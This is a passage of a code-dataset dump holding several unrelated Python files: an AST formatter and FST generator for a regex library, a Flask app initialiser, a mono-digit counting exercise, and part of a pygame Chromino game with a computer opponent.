visit_and_emit_formatted_text_union( self, n, depth, width_hint, indent, print_attr ):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n out_str = \"\"\n need_paren_for_attr = False\n\n if width_hint != 0 and width_hint < n.text_width and len(children)>1:\n\n out_str += '\\n'\n out_str += self.make_indent( (depth)*indent )\n out_str += '('\n\n first = True\n for c in children:\n if first:\n first = False\n out_str += '\\n'\n out_str += self.make_indent( (depth+1)*indent )\n\n else:\n out_str += ' |\\n'\n out_str += self.make_indent( (depth+1)*indent )\n\n out_str += self.visit_and_emit_formatted_text( c, depth + 1, width_hint, indent, print_attr )\n\n out_str += '\\n'\n out_str += self.make_indent( depth*indent )\n out_str += ')'\n else:\n c0_epilogue = children[0].epilogue_for_formatted_text()\n if len(children)>1 or c0_epilogue != '':\n out_str += '( '\n\n first = True\n for c in children:\n if first:\n first = False\n\n else:\n out_str += ' | '\n\n out_str += self.visit_and_emit_formatted_text(c, depth + 1, width_hint, indent, print_attr )\n\n out_str += ' )'\n\n else: # len(children) == 1 and prologue == '' and epilogue == ''\n out_str += self.visit_and_emit_formatted_text(children[0], depth + 1, width_hint, indent, print_attr )\n need_paren_for_attr = True\n\n return out_str, need_paren_for_attr\n\n\n # @brief recursive subroutine of visit_and_emit_formatted_text()\n def 
visit_and_emit_formatted_text_sequence( self, n, depth, width_hint, indent, print_attr ):\n\n out_str = ''\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n first = True\n for c in children:\n\n if first:\n first = False\n else:\n out_str += ' '\n\n out_str += self.visit_and_emit_formatted_text( c, depth, width_hint, indent, print_attr )\n\n need_paren_for_attr = True\n \n return out_str, need_paren_for_attr\n\n\n\n # @brief recursive subroutine of visit_and_emit_formatted_text()\n def visit_and_emit_formatted_text_finite_repeat( self, n, depth, width_hint, indent, print_attr ):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n child_prologue = children[0].prologue_for_formatted_text()\n child_epilogue = children[0].epilogue_for_formatted_text()\n\n if ( children[0].ast_node_type == 'terminal' \n or children[0].ast_node_type == 'nonterminal' \n or children[0].ast_node_type == 'union' ) and child_prologue == '' and child_epilogue == '':\n out_str = self.visit_and_emit_formatted_text( children[0] , depth , width_hint, indent, print_attr )\n else:\n out_str = '( '\n out_str += self.visit_and_emit_formatted_text( children[0] , depth , width_hint, indent, print_attr )\n out_str += ' )'\n\n\n if n.repeat_min == 0 and n.repeat_max == 1:\n out_str += '?'\n else:\n out_str += '{ '\n out_str += str(n.repeat_min )\n out_str += ', '\n out_str += str(n.repeat_max)\n out_str += ' }'\n\n need_paren_for_attr = True\n return out_str, need_paren_for_attr\n\n\n # @brief recursive subroutine of visit_and_emit_formatted_text()\n def visit_and_emit_formatted_text_infinite_repeat( self, n, depth, width_hint, indent, print_attr ):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n child_prologue = children[0].prologue_for_formatted_text()\n child_epilogue = children[0].epilogue_for_formatted_text()\n\n if ( children[0].ast_node_type == 'terminal' or children[0].ast_node_type == 'nonterminal' or children[0].ast_node_type == 'union' ) and child_prologue == '' and child_epilogue == '':\n out_str = self.visit_and_emit_formatted_text( children[0] , depth , width_hint, indent, print_attr )\n\n else:\n out_str = '( '\n out_str += self.visit_and_emit_formatted_text( children[0] , depth , width_hint, indent, print_attr )\n out_str += ' )'\n\n\n if n.repeat_min == 0:\n out_str += '*'\n else:\n out_str += '+'\n\n need_paren_for_attr = True\n return out_str, need_paren_for_attr\n\n\n ########################################\n # #\n # expand_phrases() #\n # #\n ########################################\n\n\n # @public\n # @brief generate expanded phrases\n def expand_phrases( self, gen_attributes = True ):\n\n self.node_attribute_id_next = 0\n if self.root:\n return self.visit_and_expand_phrases( self.root , gen_attributes )\n else:\n return []\n\n\n def visit_and_expand_phrases( self, n , gen_attributes ):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n \n\n main_list = []\n need_paren_for_attr = False\n\n if n.ast_node_type == 'union':\n phrases = []\n for c in children:\n phrases = phrases + self.visit_and_expand_phrases( c, gen_attributes )\n main_list = phrases\n\n elif n.ast_node_type == 'sequence':\n phrases = []\n for c in children:\n phrases = cross_product( phrases, self.visit_and_expand_phrases( c, gen_attributes ), ' ' )\n main_list = phrases\n need_paren_for_attr = True\n\n elif n.ast_node_type == 'terminal':\n main_list = [ n.content ]\n\n elif n.ast_node_type == 'nonterminal':\n main_list = [ n.content ]\n\n elif n.ast_node_type 
== 'epsilon':\n main_list = [ '' ]\n\n elif n.ast_node_type == 'finite repeat':\n if n.repeat_min == 0 and n.repeat_max == 1:\n phrases = [ '' ]\n phrases = phrases + self.visit_and_expand_phrases( children[0], gen_attributes )\n main_list = phrases\n else:\n # We don't further expand into repetition.\n phrase, need_paren_for_attr = self.visit_and_emit_formatted_text_finite_repeat( n, 0, 0, 0, gen_attributes )\n main_list = [ phrase ]\n\n elif n.ast_node_type == 'infinite repeat':\n # We don't further expand into repetition.\n phrase, need_paren_for_attr = self.visit_and_emit_formatted_text_infinite_repeat( n, 0, 0, 0, gen_attributes )\n main_list = [ phrase ]\n\n if gen_attributes:\n prologue = ''\n if n.ast_node_type == 'union' or n.ast_node_type == 'sequence' or n.ast_node_type == 'finite repeat' or n.ast_node_type == 'infinite repeat':\n prologue = n.attribute_for_expansion_before( self.node_attribute_id_next )\n\n epilogue = ''\n if n.ast_node_type == 'terminal' or n.ast_node_type == 'nonterminal' or n.ast_node_type == 'union' or n.ast_node_type == 'sequence' or n.ast_node_type == 'finite repeat' or n.ast_node_type == 'infinite repeat':\n epilogue = n.attribute_for_expansion_after( self.node_attribute_id_next )\n if prologue != '' or epilogue != '':\n self.node_attribute_id_next += 1\n\n updated_main_list = []\n if prologue != '':\n if epilogue != '':\n\n for m in main_list:\n if m != '':\n if need_paren_for_attr:\n updated_main_list.append( '( ' + prologue + ' ( ' + m + ' ) ' + epilogue + ' )' )\n else:\n updated_main_list.append( '( ' + prologue + ' ' + m + ' ' + epilogue + ' )' )\n else:\n updated_main_list.append( '( ' + prologue + ' __EPS__ ' + epilogue + ' )' )\n else:\n\n for m in main_list:\n if m != '':\n if need_paren_for_attr:\n updated_main_list.append( '( ' + prologue + ' ( ' + m + ' ) )' )\n else:\n updated_main_list.append( '( ' + prologue + ' ' + m + ' )' )\n else:\n updated_main_list.append( '( ' + prologue + ' __EPS__ )' )\n\n else: \n if epilogue != '':\n for m in main_list:\n if m != '':\n if need_paren_for_attr:\n updated_main_list.append( '( ( ' + m + ' ) ' + epilogue + ' )' )\n else:\n updated_main_list.append( '( ' + m + ' ' + epilogue + ' )' )\n else:\n updated_main_list.append( '( __EPS__ ' + epilogue + ' )' )\n else:\n for m in main_list:\n updated_main_list.append( m )\n\n return updated_main_list\n\n else:\n return main_list\n\n\n ########################################\n # #\n # draw() #\n # #\n ########################################\n\n\n # @public\n # @brief draws AST with graphviz\n # @param tree_name : output file name\n # @param view_now : True/False launch viewer immediately\n # @param out_format : 'svg' or 'pdf'. Use 'svg' if window's PDF renders\n # messes up UTF-8.\n # @param orientagion: 'vertical' or 'horizontal'. 
top to bottom or left to right.\n # specifies the direction of \n # the tree from the root toward children.\n def draw( self, tree_name, view_now = True, out_format =\"svg\", orientation =\"vertical\" ):\n\n g_dot = Digraph( comment = tree_name )\n if orientation == 'horizontal':\n g_dot.graph_attr['rankdir'] = 'LR'\n node_set = set()\n\n self.node_id = 1\n\n self.visit_and_draw( self.root, g_dot , -1, node_set )\n\n for n in self.nodes():\n if hasattr(n, 'node_id'):\n delattr( n, 'node_id' )\n\n g_dot.render(tree_name.strip('<>'), view=view_now, format=out_format)\n\n\n # @brief recursive subroutine of draw()\n def visit_and_draw( self, n, dot , parent_id, node_set ):\n \n n.node_id = self.node_id\n should_visit_children = True\n\n self.node_id += 1\n if n.node_id not in node_set:\n\n label_out, should_visit_children = n.generate_string_for_drawing(True)\n dot.node( str(n.node_id), label_out )\n\n node_set.add(n.node_id)\n\n\n if parent_id != -1:\n dot.edge( str(parent_id), str(n.node_id) )\n\n \n if should_visit_children:\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n for c in children:\n self.visit_and_draw( c , dot, n.node_id, node_set )\n\n # Add horizontal edges to force ordering among children.\n for i in range( 0, len(children)-1 ):\n dot.edge( str(children[i].node_id), str(children[i+1].node_id) ,style='invis' )\n\n with dot.subgraph() as s:\n s.attr(rank = 'same')\n for c in children:\n s.node(str(c.node_id))\n\n\n ########################################\n # #\n # generate_fst() #\n # #\n ########################################\n\n\n # @brief generate FST\n # finite repeat must be expanded into union\n #\n # @param generate_out_tokens\n #\n # @param generate_balancedids\n def generate_fst ( self, generate_out_tokens = True ):\n\n if self.root:\n self.node_attribute_id_next = 0\n return self.visit_and_generate_fst( self.root, generate_out_tokens )\n\n else:\n return None\n\n\n # @brief recursive subroutine to generate_fst()\n def visit_and_generate_fst( self, n, generate_out_tokens ):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n g_main = None\n\n if n.ast_node_type == 'union': \n graphs = []\n for c in children:\n graphs.append( self.visit_and_generate_fst( c, generate_out_tokens ) )\n g_main = fa.ttsp_bundle( graphs )\n\n elif n.ast_node_type == 'sequence':\n graphs = []\n for c in children:\n graphs.append( self.visit_and_generate_fst( c, generate_out_tokens ) )\n g_main = fa.ttsp_concatenate( graphs )\n\n elif n.ast_node_type == 'terminal':\n in_token, out_token = n.node_content_for_fst_main( self.node_attribute_id_next )\n self.node_attribute_id_next += 1\n\n g_main = fa.make_unit_transition( in_token, out_token )\n\n elif n.ast_node_type == 'nonterminal':\n in_token, out_token = n.node_content_for_fst_main( self.node_attribute_id_next )\n self.node_attribute_id_next += 1\n\n g_main = fa.make_unit_transition( in_token, out_token )\n\n elif n.ast_node_type == 'epsilon':\n g_main = fa.make_unit_epsilon()\n\n elif n.ast_node_type == 'infinite repeat' or n.ast_node_type == 'finite repeat':\n\n if n.repeat_min == 0:\n if n.repeat_max == 1:\n graphs = []\n graphs.append( self.visit_and_generate_fst( children[0], generate_out_tokens ) )\n graphs.append( fa.make_unit_epsilon() )\n g_main = fa.ttsp_bundle( graphs )\n else:\n graphs = []\n graphs.append( self.visit_and_generate_fst( children[0], generate_out_tokens ) )\n graphs.append( fa.make_unit_epsilon() )\n g_inside = fa.ttsp_bundle( graphs )\n
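 # fa.enclose_in_cycle presumably wraps g_inside in a back-edge cycle so\n # the optional body can repeat; a repeat_max of -1 encodes an unbounded loop.\n g_main = fa.enclose_in_cycle( 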
g_inside, n.repeat_max )\n else:\n g_inside = self.visit_and_generate_fst( children[0], generate_out_tokens )\n g_main = fa.enclose_in_cycle( g_inside, n.repeat_max )\n\n else:\n return None\n\n\n if generate_out_tokens:\n\n # pair-up the attributes by using the same attribute ID.\n out_token_pre = n.extra_epsilon_nodes_before ( )\n out_token_post = n.extra_epsilon_nodes_after ( )\n\n if out_token_pre != '' or out_token_post != '':\n\n marker_pre = '[PRE {:d}]'.format(self.node_attribute_id_next)\n marker_post = '[POST {:d}]'.format(self.node_attribute_id_next)\n self.node_attribute_id_next += 1\n\n serial_graphs = []\n serial_graphs.append( fa.make_unit_transition( marker_pre, out_token_pre ) )\n serial_graphs.append( g_main )\n serial_graphs.append( fa.make_unit_transition( marker_post, out_token_post ) )\n return fa.ttsp_concatenate( serial_graphs )\n\n else:\n return g_main\n\n else:\n return g_main\n\n\n ########################################\n # #\n # count_phrases() #\n # #\n ########################################\n\n\n # @public\n # @brief count the number of phrases the node accepts\n # as a root of the subtree.\n # under the repeat nodes are not explored\n def count_phrases(self):\n if self.root:\n self.visit_and_count_phrases( self.root )\n\n\n # @brief recursive subroutine of count_phrases()\n def visit_and_count_phrases( self, n ):\n\n children = [ e.other_node_of( n ) for e in n.out_neighbors() ]\n\n for c in children:\n self.visit_and_count_phrases( c )\n\n if n.ast_node_type == 'union':\n n.phrase_count = 0\n for c in children:\n n.phrase_count += c.phrase_count\n \n elif n.ast_node_type == 'sequence':\n\n n.phrase_count = 1\n for c in children:\n n.phrase_count *= c.phrase_count\n\n else:\n n.phrase_count = 1\n","repo_name":"ShoYamanishi/nlpregex","sub_path":"regular_language/ast.py","file_name":"ast.py","file_ext":"py","file_size_in_byte":64076,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"71932900968","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\nimport dotenv, os, logging\nfrom logging.handlers import RotatingFileHandler\n\n# set the project root directory as an environment variable to be used in other modules\nos.environ[\"PROJECT_ROOT\"] = os.path.abspath(\n os.path.join(os.path.abspath(os.path.dirname(__file__)), os.pardir)\n)\nos.environ[\"ENV_PATH\"] = os.path.join(os.environ.get(\"PROJECT_ROOT\"), \".env\")\ncheck_for_dotenv = os.path.exists(os.environ.get(\"ENV_PATH\"))\n\nif check_for_dotenv:\n # if the .env file exists, load it into the environment\n dotenv.load_dotenv(dotenv_path=os.environ.get(\"ENV_PATH\"))\n print(\"loaded environment variables from .env file\")\n os.environ[\"ENV_MODE\"] = \"dev\"\nelse:\n print(\"Loading environment variables from system.\")\ntry:\n assert os.environ.get(\"SQLALCHEMY_DATABASE_URI\") is not None\n assert os.environ.get(\"SECRET_KEY\") is not None\n assert os.environ.get(\"ADMIN_PASSWORD\") is not None\nexcept AssertionError as e:\n print(\"One or more missing environment variables.\")\n raise e\n\n# initialize the app configuration with the utils module and Config class\nclass Config:\n \"\"\"\n @field SQLALCHEMY_DATABASE_URI: The URI for the database.\n @field UPLOADS_FOLDER: The folder where uploaded files are stored.\n @field THUMBNAILS_FOLDER: The folder where thumbnails are stored.\n @field SECRET_KEY: The secret key for the app.\n @field SQLALCHEMY_TRACK_MODIFICATIONS: Whether to 
track modifications to the database.\n @field SQLALCHEMY_ECHO: Whether to echo SQL statements to the console.\n @field ADMIN_PASSWORD: The password for the admin user.\n \"\"\"\n\n SQLALCHEMY_DATABASE_URI = os.environ.get(\"SQLALCHEMY_DATABASE_URI\")\n UPLOADS_FOLDER = os.environ.get(\"PROJECT_ROOT\") + \"/app/static/uploads\"\n THUMBNAILS_FOLDER = (\n os.environ.get(\"PROJECT_ROOT\") + \"/app/static/uploads/thumbnails\"\n )\n SECRET_KEY = os.environ.get(\"SECRET_KEY\")\n SQLALCHEMY_TRACK_MODIFICATIONS = (\n os.environ.get(\"SQLALCHEMY_TRACK_MODIFICATIONS\") or False\n )\n SQLALCHEMY_ECHO = os.environ.get(\"SQLALCHEMY_ECHO\") or False\n ADMIN_PASSWORD = os.environ.get(\"ADMIN_PASSWORD\")\n\n\n# create the folder structure for the uploads and thumbnails, if they do not exist\nos.makedirs(Config.THUMBNAILS_FOLDER, exist_ok=True)\n\n# create an instance of the Config class\nconf = Config()\n\n# initialize the database\ndb: SQLAlchemy = SQLAlchemy()\n\n# initialize the login manager\nlogin_manager = LoginManager()\n\n# set the login view for the login manager\nlogin_manager.login_view = \"routes.login\"\n\n\n# create the app factory function and register the blueprints and database\ndef create_app():\n \"\"\"\n Create the app instance and register the blueprints and database.\n @return: The app instance.\n \"\"\"\n # create the flask app instance\n app = Flask(__name__)\n\n # load the app configuration\n app.config.from_object(Config)\n\n log_level = logging.INFO\n\n # Define the log file path\n log_file_path = f\"{os.environ['PROJECT_ROOT']}/app.log\"\n\n # Create a log formatter\n log_formatter = logging.Formatter(\n \"[%(asctime)s] [%(levelname)s] %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n )\n\n # Create a rotating file handler to log messages to the file\n file_handler = RotatingFileHandler(log_file_path, maxBytes=1000000, backupCount=5)\n file_handler.setFormatter(log_formatter)\n\n # Get the app's logger and add the file handler to it\n app.logger.addHandler(file_handler)\n\n # Set the log level for the app's logger\n app.logger.setLevel(log_level)\n\n # initialize the database\n db.init_app(app)\n\n # initialize the login manager\n login_manager.init_app(app)\n\n # using the app context, register the blueprints and models\n with app.app_context():\n\n # import the routes and models modules\n from . import routes\n from . import models\n\n # register the blueprints\n app.register_blueprint(routes.endpoint)\n\n # create the database tables if they do not exist\n db.create_all()\n\n # from .scripts import test_memes\n # test_memes.generate_test_memes()\n # return the app instance\n return app\n\n\n# create the app instance\napp = create_app()\n","repo_name":"Willmo103/Meme-Share","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34974700709","text":"inp = input(\"Enter a sequence of positive integers, each one on a separate line. 
\\n \"\n \"End your sequence by typing -1: \")\n\ncount = 0\n\n\nwhile int(inp) != -1:\n check = True\n for each in range(1, len(inp), 1):\n if inp[0] != inp[each]:\n check = False\n if check:\n count += 1\n inp = input()\n\nprint(\"You entered \" + str(count) + \" mono-digit numbers\")\n","repo_name":"otisscott/1114-Stuff","sub_path":"Lab 6/monodigit.py","file_name":"monodigit.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26400992830","text":"# Import the pygame module\nimport time\n\nimport pygame\nimport random\nimport datetime\n\n# Import pygame.locals for easier access to key coordinates\n# Updated to conform to flake8 and black standards\n\nfrom pygame.locals import (\n QUIT,\n MOUSEBUTTONDOWN,\n MOUSEBUTTONUP,\n MOUSEMOTION,\n)\n\nimport blocks\nimport playground\n\ndef timing(func):\n def inner(*args,**kwargs):\n print('******************* '+func.__name__+' *******************' )\n ct = datetime.datetime.now()\n print(\"current time:-\", ct)\n result = func(*args,**kwargs)\n ct = datetime.datetime.now()\n print(\"current time:-\", ct)\n return result\n return inner\n\ndef moveAllSpriteBoard(direction,board):\n global xRectifCoef\n global yRectifCoef\n\n if direction == 'U':\n yRectifCoef = yRectifCoef + 1\n\n if direction == 'D':\n yRectifCoef = yRectifCoef - 1\n\n if direction == 'L':\n xRectifCoef = xRectifCoef + 1\n\n if direction == 'R':\n xRectifCoef = xRectifCoef - 1\n\n for block in board:\n if direction == 'U':\n block.setPosXRectif(block.x)\n block.setPosYRectif(block.y - block.SQUAREBORDERSIZECONST)\n #block.redraw()\n\n if direction == 'D':\n block.setPosXRectif(block.x)\n block.setPosYRectif(block.y + block.SQUAREBORDERSIZECONST)\n #block.redraw()\n\n if direction == 'L':\n block.setPosYRectif(block.y)\n block.setPosXRectif(block.x - block.SQUAREBORDERSIZECONST)\n #block.redraw()\n\n if direction == 'R':\n block.setPosYRectif(block.y)\n block.setPosXRectif(block.x + block.SQUAREBORDERSIZECONST)\n\n if block.orientation == 'H':\n if (block.x + (3 * theBoard.rectsize) < theBoard.boardTable.size[0] and block.y < theBoard.boardTable.size[1]\\\n and (block.y > 127)):\n block.hide = False\n else:\n block.hide = True\n\n if block.orientation == 'V':\n if block.x < theBoard.boardTable.size[0] and block.y + (3 * theBoard.rectsize) < theBoard.boardTable.size[1]\\\n and (block.y > 127):\n block.hide = False\n else:\n block.hide = True\n\n block.redraw()\n\n\ndef addToMatrix(matrix,block):\n global minX\n global maxX\n global minY\n global maxY\n\n x = int(block.x/theBoard.rectsize + MATRIXCOEF + xRectifCoef)\n y = int(block.y/theBoard.rectsize + MATRIXCOEF + yRectifCoef)\n xOrig = x\n yOrig = y\n\n matrix[x][y]=block.col1\n\n if block.orientation == 'H':\n if x < minX or minX == 0:\n minX = xOrig\n\n if x + 2 > maxX or minX == 0:\n maxX = x + 2\n\n if y < minY or minY == 0:\n minY = yOrig\n elif y > maxY or minX == 0:\n maxY = yOrig\n\n x = x + 1\n matrix[x][y] = block.col2\n x = x + 1\n matrix[x][y] = block.col3\n\n else:\n\n if x < minX or minX == 0:\n minX = x\n elif x > maxX or minX == 0:\n maxX = x\n\n if y < minY or minY == 0:\n minY = y\n\n if y+2 > maxY or minY == 0:\n maxY = y + 2\n\n y = y + 1\n matrix[x][y] = block.col2\n y = y + 1\n matrix[x][y] = block.col3\n\n if maxY ==0:\n maxY = minY\n\ndef transScreenPosMatPosX(x):\n x = int((x / theBoard.rectsize) + MATRIXCOEF)\n return x + xRectifCoef\n\ndef transScreenPosMatPosY(y):\n y = int((y / theBoard.rectsize) + 
MATRIXCOEF)\n return y + yRectifCoef\n\ndef checkBlockArround(matrix,color,x,y):\n val = 0\n # curent pos\n x = int(x)\n y = int(y)\n if matrix[x][y] != 0:\n return -1\n\n # left\n #if matrix[x-1][ y] != 0:\n # return -1\n\n if matrix[x-1][ y] == color:\n val = val + 1\n\n if matrix[x-1][y] != color and matrix[x-1][ y] != 0:\n return - 1\n\n # up\n #if matrix[x ][ y-1] != 0:\n # return -1\n\n if matrix[x ][ y-1] == color:\n val = val + 1\n\n if matrix[x][ y-1] != color and matrix[x][ y-1] != 0:\n return - 1\n\n\n # right\n #if matrix[x + 1][ y] != 0:\n # return -1\n\n if matrix[x+1][ y] == color:\n val = val + 1\n\n if matrix[x+1][ y] != color and matrix[x+1][ y] != 0:\n return - 1\n\n # down\n #if matrix[x ][ y + 1] != 0:\n # return -1\n\n if matrix[x][ y+1] == color:\n val = val + 1\n\n if matrix[x][ y+1] != color and matrix[x][ y+1] != 0:\n return - 1\n\n return val\n\ndef validationBlockV(matrix,block,x,y):\n val = 0\n rep = checkBlockArround(matrix, block.col1,int(x),int(y))\n\n if rep == -1:\n return False\n else:\n val = val + rep\n\n rep = checkBlockArround(matrix, block.col2, int(x ), int(y+1))\n\n if rep == -1:\n return False\n else:\n val = val + rep\n\n rep = checkBlockArround(matrix, block.col3, int(x ), int(y+2))\n\n if rep == -1:\n return False\n else:\n val = val + rep\n\n return val > 1\n\ndef validationBlockH(matrix, block, x, y):\n val = 0\n\n rep = checkBlockArround(matrix, block.col1, int(x), int(y))\n\n if rep == -1:\n return False\n else:\n val = val + rep\n\n rep = checkBlockArround(matrix, block.col2, int(x+1) , int(y))\n\n if rep == -1:\n return False\n else:\n val = val + rep\n\n rep = checkBlockArround(matrix, block.col3, int(x+2) , int(y))\n\n if rep == -1:\n return False\n else:\n val = val + rep\n\n return val > 1\n\ndef validationBlock(matrix,block,x,y):\n if block.orientation == 'H':\n return validationBlockH(matrix, block, x, y)\n\n if block.orientation == 'V':\n return validationBlockV(matrix, block, x, y)\n\n\ndef computerIA(matrix, computer, minX, maxX, minY, maxY, handicap = 100):\n\n\n blockOk = False\n find = False\n for block in computer:\n i = 0\n while i <= 3 and not find:\n x = minX - 3\n while x <= maxX + 2 and not find:\n x = x + 1\n y = minY - 3\n\n while y <= maxY + 2 and not find:\n y = y + 1\n if (block.orientation == 'H' and matrix[x][y] == 0 and matrix[x+1][y] == 0 and matrix[x+2][y] == 0 ) or \\\n (block.orientation == 'V' and matrix[x][y] == 0 and matrix[x][y+1] == 0 and matrix[x][y+2] == 0 ):\n blockOk = validationBlock(matrix,block,x,y)\n if blockOk :\n if int(random.randint(0, 100)) <= handicap:\n find = True\n\n if not find:\n block.rotate()\n i = i + 1\n\n if find:\n break\n\n if blockOk:\n theBoard.scoreBoard(len(computer), 15, 33, 'Adversaire',screen)\n theBoard.scoreBoard(len(player), 215, 33, 'Moi',screen)\n pygame.display.flip()\n\n rect = pygame.Rect(SCREEN_WIDTH / 2 - 200, SCREEN_HEIGHT / 2 - 300, 50, 50)\n\n icon = pygame.image.load('./assets/reflechir.png')\n icon = pygame.transform.scale(icon, (50, 50))\n\n # surface.blit(self.icon, self.rect)\n #screen.blit(icon, rect)\n #pygame.display.flip()\n\n pygame.mixer.Sound.play(soundClock)\n pygame.mixer.music.stop()\n\n time.sleep(2)\n\n calculX = ((x - MATRIXCOEF) * theBoard.rectsize) - (xRectifCoef * theBoard.rectsize)\n calculY = ((y - MATRIXCOEF) * theBoard.rectsize) - (yRectifCoef * theBoard.rectsize)\n\n block.setPosX(calculX)\n block.setPosY(calculY)\n block.lastIaPlayed = True\n block.lastPlayedTime = time.time()\n block.lastRefreshScreen = time.time()\n 
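# hand the chosen block over to the board: addToMatrix records its three\n # colors in the shared occupancy matrix and widens the bounding box\n # (minX..maxX, minY..maxY) that the placement search scans on later turns\n 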
addToMatrix(gameMatrix, block)\n computer.remove(block)\n board.append(block)\n block.redraw()\n blocksGroup.add(block)\n\n else:\n theBoard.scoreBoard(len(computer), 15, 33, 'Adversaire',screen)\n theBoard.scoreBoard(len(player), 215, 33, 'Moi',screen)\n pygame.display.flip()\n\n blocksInBag = bag.getNumberBlock()\n randomBlockId = random.randint(0, blocksInBag - 1)\n computer.append(bag.getBlock(randomBlockId))\n bag.removeBlock(bag.getBlock(randomBlockId))\n rect = pygame.Rect(SCREEN_WIDTH / 2 - 200, SCREEN_HEIGHT / 2 - 300, 50, 50)\n\n pygame.mixer.Sound.play(soundTake)\n pygame.mixer.music.stop()\n\n icon = pygame.image.load('./assets/IA_takes.png')\n icon = pygame.transform.scale(icon, (400, 400))\n\n\n # surface.blit(self.icon, self.rect)\n screen.blit(icon, rect)\n pygame.display.flip()\n time.sleep(3)\n\ndef findFreeSpace(x = None, y = None):\n if x is None:\n x = theBoard.playerTable.x\n if y is None:\n y = theBoard.playerTable.y\n\n for blockPlayer in player:\n if blockPlayer.x == x and blockPlayer.y == y:\n x = (x + blockPlayer.SQUAREBORDERSIZE * 3) + 5\n if x > theBoard.playerTable.width:\n x = 0\n y = y + blockPlayer.SQUAREBORDERSIZE + 5\n return findFreeSpace(x, y)\n\n if y > screen.get_height():\n x = theBoard.playerTable.x\n y = theBoard.playerTable.y\n break\n\n return findFreeSpace(x, y)\n\n return (x,y)\n\ndef score(Score = 0 ):\n\n tenPart = int(Score/10)\n unitPart = Score % 10\n\n fileTen = './assets/'+str(tenPart)+'.png'\n fileUnit = './assets/'+str(unitPart)+'.png'\n numberL = pygame.image.load(fileTen)\n numberR = pygame.image.load(fileUnit)\n\n numberL = pygame.transform.scale(numberL, (40, 40))\n numberR = pygame.transform.scale(numberR, (40, 40))\n\n return(numberL,numberR)\n\nif __name__ == \"__main__\":\n #sound\n pygame.mixer.init()\n soundPlayerOk = pygame.mixer.Sound(\"./assets/playerOk.wav\")\n soundPlayerNok = pygame.mixer.Sound(\"./assets/fail.wav\")\n soundClock = pygame.mixer.Sound(\"./assets/clock.wav\")\n soundBack = pygame.mixer.Sound(\"./assets/background.mp3\")\n soundGameOver = pygame.mixer.Sound(\"./assets/gameover.mp3\")\n soundWin = pygame.mixer.Sound(\"./assets/win.mp3\")\n soundTake = pygame.mixer.Sound(\"./assets/takeinbag.mp3\")\n\n pygame.mixer.Sound.play(soundBack,-1)\n\n\n # Define constants for the screen width and height\n xRectifCoef = 0\n yRectifCoef = 0\n\n MATRIXCOEF = 100\n #SCREEN_WIDTH = 1440\n #SCREEN_HEIGHT = 900\n FPS = 30\n NBRBLOCKBYPLAYER = 9\n BACKGROUNDCOLOR = (0,0,0)\n\n\n # Initialize pygame\n pygame.init()\n\n\n # Create the screen object\n # The size is determined by the constant SCREEN_WIDTH and SCREEN_HEIGHT\n #screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n screen = pygame.display.set_mode()\n pygame.display.set_caption('CHROMINO')\n SCREEN_WIDTH = screen.get_width()\n SCREEN_HEIGHT = screen.get_height()\n #create playGround\n theBoard = playground.PlayGround(SCREEN_WIDTH,SCREEN_HEIGHT)\n\n # Instantiate a bag of blocks\n bag = blocks.Bag(theBoard.surf)\n\n #get randomly the first block to start the game\n #always a 3-color block\n #always among the first five positions in the bag\n startBlockId = random.randint(0, 4)\n blockZero = bag.getBlock(startBlockId)\n bag.removeBlock(blockZero)\n\n #put the first block in the middle of the board\n blockZero.block.x = blockZero.rectifPos(theBoard.boardTable.centerx)\n blockZero.block.y = blockZero.rectifPos(theBoard.boardTable.centery)\n blockZero.setPosX(blockZero.block.x)\n blockZero.setPosY(blockZero.block.y)\n blockZero.canBeMoved = 
False\n\n #create MBR\n #minX = blockZero.x\n #maxX = blockZero.x + 3\n #minY = blockZero.y\n #maxY = blockZero.y + 3\n\n minX = 0\n maxX = 0\n minY = 0\n maxY = 0\n\n #create the board\n board = []\n board.append(blockZero)\n\n #create the blocks for the player\n player = []\n for i in range(NBRBLOCKBYPLAYER):\n blocksInBag = bag.getNumberBlock()\n randomBlockId = random.randint(0, blocksInBag-1)\n player.append(bag.getBlock(randomBlockId))\n bag.removeBlock(bag.getBlock(randomBlockId))\n\n #create the blocks for the computer\n computer = []\n for i in range(NBRBLOCKBYPLAYER):\n blocksInBag = bag.getNumberBlock()\n randomBlockId = random.randint(0, blocksInBag-1)\n computer.append (bag.getBlock(randomBlockId))\n bag.removeBlock(bag.getBlock(randomBlockId))\n\n gameMatrix = [[0 for _ in range(1000)] for _ in range(1000)]\n\n addToMatrix(gameMatrix,blockZero)\n\n #create sprite group\n blocksGroup = pygame.sprite.Group()\n\n #blit the sceen\n screen.blit(theBoard.surf,theBoard.playGround)\n\n blocksGroup.add(blockZero)\n posXPlayer = 0\n posYPlayer = SCREEN_HEIGHT - 180\n for playerBlock in player:\n\n playerBlock.setPosX(posXPlayer)\n playerBlock.setPosY(posYPlayer)\n playerBlock.block.x = posXPlayer\n playerBlock.block.y = posYPlayer\n\n playerBlock.canBeMoved = True\n blocksGroup.add(playerBlock)\n posXPlayer += 100\n\n #to debug IA\n\n \"\"\"\n posXComputer = SCREEN_WIDTH - 180\n posYComputer = 0\n for playerComputer in computer:\n playerComputer.setPosX(posXComputer)\n playerComputer.setPosY(posYComputer)\n playerComputer.block.x = posXComputer\n playerComputer.block.y = posYComputer\n\n playerComputer.canBeMoved = False\n blocksGroup.add(playerComputer)\n posYComputer += 30\n \"\"\"\n ##########\n\n # Variable to keep the main loop running\n running = True\n\n clock = pygame.time.Clock()\n captured = False\n arrowCaptured = False\n addBlock = False\n 